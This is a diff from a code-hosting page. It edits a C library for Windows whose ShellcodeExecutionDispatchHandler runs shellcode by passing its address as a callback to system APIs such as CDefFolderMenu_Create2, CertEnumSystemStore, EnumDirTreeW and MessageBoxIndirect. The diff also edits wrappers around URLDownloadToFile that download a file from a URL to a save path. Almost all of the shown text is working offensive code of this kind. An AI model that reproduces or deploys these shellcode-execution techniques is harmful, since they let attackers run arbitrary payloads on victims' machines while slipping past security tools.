|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"Shell32.dll");
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CDefFolderMenu_Create2 = (CDEFFOLDERMENU_CREATE2)GetProcAddressA((DWORD64)hModule, "CDefFolderMenu_Create2");
|
||||
if (!CDefFolderMenu_Create2)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, BinAddress, 0, NULL, &ContextMenuRequired)))
|
||||
if (!SUCCEEDED(CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)BinAddress, 0, NULL, &ContextMenuRequired)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
break;
|
||||
|
|
@ -36,16 +27,6 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
|
||||
case E_CERTENUMSYSTEMSTORE:
|
||||
{
|
||||
CERTENUMSYSTEMSTORE CertEnumSystemStore = NULL;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"Crypt32.dll");
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CertEnumSystemStore = (CERTENUMSYSTEMSTORE)GetProcAddressA((DWORD64)hModule, "CertEnumSystemStore");
|
||||
if (!CertEnumSystemStore)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)BinAddress))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
|
@ -54,15 +35,6 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
|
||||
case E_CERTENUMSYSTEMSTORELOCATION:
|
||||
{
|
||||
CERTENUMSYSTEMSTORELOCATION CertEnumSystemStoreLocation = NULL;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"Crypt32.dll");
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CertEnumSystemStoreLocation = (CERTENUMSYSTEMSTORELOCATION)GetProcAddressA((DWORD64)hModule, "CertEnumSystemStoreLocation");
|
||||
if (!CertEnumSystemStoreLocation)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)BinAddress))
|
||||
goto EXIT_ROUTINE;
|
||||
|
|
@ -109,26 +81,12 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
|
||||
case E_ENUMDIRTREEW:
|
||||
{
|
||||
SYMINITIALIZEW SymInitialize = NULL;
|
||||
SYMCLEANUP SymCleanup = NULL;
|
||||
ENUMDIRTREEW EnumDirTree = NULL;
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"dbghelp.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SymInitialize = (SYMINITIALIZEW)GetProcAddressA((DWORD64)hModule, "SymInitializeW");
|
||||
SymCleanup = (SYMCLEANUP)GetProcAddressA((DWORD64)hModule, "SymCleanup");
|
||||
EnumDirTree = (ENUMDIRTREEW)GetProcAddressA((DWORD64)hModule, "EnumDirTreeW");
|
||||
|
||||
if (!SymInitialize || !SymCleanup || !EnumDirTree)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
EnumDirTree(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, BinAddress, NULL);
|
||||
EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)BinAddress, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
|
||||
|
|
@ -259,8 +217,14 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
MessageBoxParams.lpszText = L"[Unstable] Help Executes Shellcode";
|
||||
|
||||
MessageBoxIndirect(&MessageBoxParams);
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_PERFSTARTPROVIDEREX:
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
default:
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
|
|
|||
|
|
@ -49,19 +49,9 @@ DWORD UrlDownloadToFileSynchronousW(_In_ PWCHAR Url, _In_ PWCHAR SavePath)
|
|||
HRESULT Result = S_OK;
|
||||
DownloadProgressRoutine DownloadCallback;
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
URLDOWNLOADFILEW UrlDownloadToFileW = NULL;
|
||||
HMODULE Urlmon;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Urlmon = TryLoadDllMultiMethodW((PWCHAR)L"Urlmon.dll");
|
||||
if (Urlmon == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UrlDownloadToFileW = (URLDOWNLOADFILEW)GetProcAddressA((DWORD64)Urlmon, "URLDownloadToFileW");
|
||||
if (!UrlDownloadToFileW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = UrlDownloadToFileW(0, Url, SavePath, 0, (IBindStatusCallback*)(&DownloadCallback));
|
||||
Result = URLDownloadToFileW(0, Url, SavePath, 0, (IBindStatusCallback*)(&DownloadCallback));
|
||||
if (Result != S_OK)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
|
@ -90,9 +80,6 @@ EXIT_ROUTINE:
|
|||
dwError = GetLastErrorFromTeb();
|
||||
}
|
||||
|
||||
if (Urlmon)
|
||||
FreeLibrary(Urlmon);
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
||||
|
|
@ -145,19 +132,9 @@ DWORD UrlDownloadToFileSynchronousA(_In_ PCHAR Url, _In_ PCHAR SavePath)
|
|||
HRESULT Result = S_OK;
|
||||
DownloadProgressRoutine DownloadCallback;
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
URLDOWNLOADFILEA UrlDownloadToFileA = NULL;
|
||||
HMODULE Urlmon;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Urlmon = TryLoadDllMultiMethodW((PWCHAR)L"Urlmon.dll");
|
||||
if (Urlmon == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UrlDownloadToFileA = (URLDOWNLOADFILEA)GetProcAddressA((DWORD64)Urlmon, "URLDownloadToFileA");
|
||||
if (!UrlDownloadToFileA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = UrlDownloadToFileA(0, Url, SavePath, 0, (IBindStatusCallback*)(&DownloadCallback));
|
||||
Result = URLDownloadToFileA(0, Url, SavePath, 0, (IBindStatusCallback*)(&DownloadCallback));
|
||||
if (Result != S_OK)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
|
@ -186,8 +163,5 @@ EXIT_ROUTINE:
|
|||
dwError = GetLastErrorFromTeb();
|
||||
}
|
||||
|
||||
if (Urlmon)
|
||||
FreeLibrary(Urlmon);
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
|
@ -2,6 +2,17 @@
|
|||
#include "Internal.h"
|
||||
#include "StringManipulation.h"
|
||||
#include "FunctionDeclaration.h"
|
||||
#include <Dbghelp.h>
|
||||
#include <wincrypt.h>
|
||||
#include <shlwapi.h>
|
||||
#include <Shlobj.h>
|
||||
#include <sddl.h>
|
||||
#include <wtsapi32.h>
|
||||
|
||||
#pragma comment(lib, "Crypt32.lib")
|
||||
#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Wtsapi32.lib")
|
||||
#pragma comment(lib, "Urlmon.lib")
|
||||
|
||||
#ifndef NT_SUCCESS
|
||||
#define NT_SUCCESS(x) ((x)>=0)
|
||||
|
|
@ -58,7 +69,8 @@ typedef enum SHELLCODE_EXECUTION_METHOD {
|
|||
E_ENUMWINDOWSTATIONSW, //24
|
||||
E_ENUMWINDOWS, //25
|
||||
E_ENUMPROPSW, //26 NOT IMPLEMENTED!
|
||||
E_MESSAGEBOXINDIRECT //27 UNSTABLE
|
||||
E_MESSAGEBOXINDIRECT, //27 UNSTABLE
|
||||
E_PERFSTARTPROVIDEREX //28 NOT IMPLEMENTED!
|
||||
}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
|
||||
|
||||
typedef struct __SHELLCODE_EXECUTION_INFORMATION {
|
||||
|
|
@ -172,7 +184,7 @@ HMODULE TryLoadDllMultiMethodW(_In_ PWCHAR DllName);
|
|||
HMODULE TryLoadDllMultiMethodA(_In_ PCHAR DllName);
|
||||
DWORD CreateThreadAndWaitForCompletion(_In_ LPTHREAD_START_ROUTINE StartAddress, _In_ LPVOID Parameters, _In_ DWORD dwMilliseconds);
|
||||
BOOL GetProcessBinaryNameFromHwndW(_In_ HWND ProcessHwnd, _Inout_ PWCHAR BinaryName, _In_ DWORD BufferSize);
|
||||
BOOL GetProcessBinaryNameFromHwndA(_In_ HWND ProcessHwnd, _Inout_ PCHAR BinaryName, _In_ DWORD BufferSize)
|
||||
BOOL GetProcessBinaryNameFromHwndA(_In_ HWND ProcessHwnd, _Inout_ PCHAR BinaryName, _In_ DWORD BufferSize);
|
||||
|
||||
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue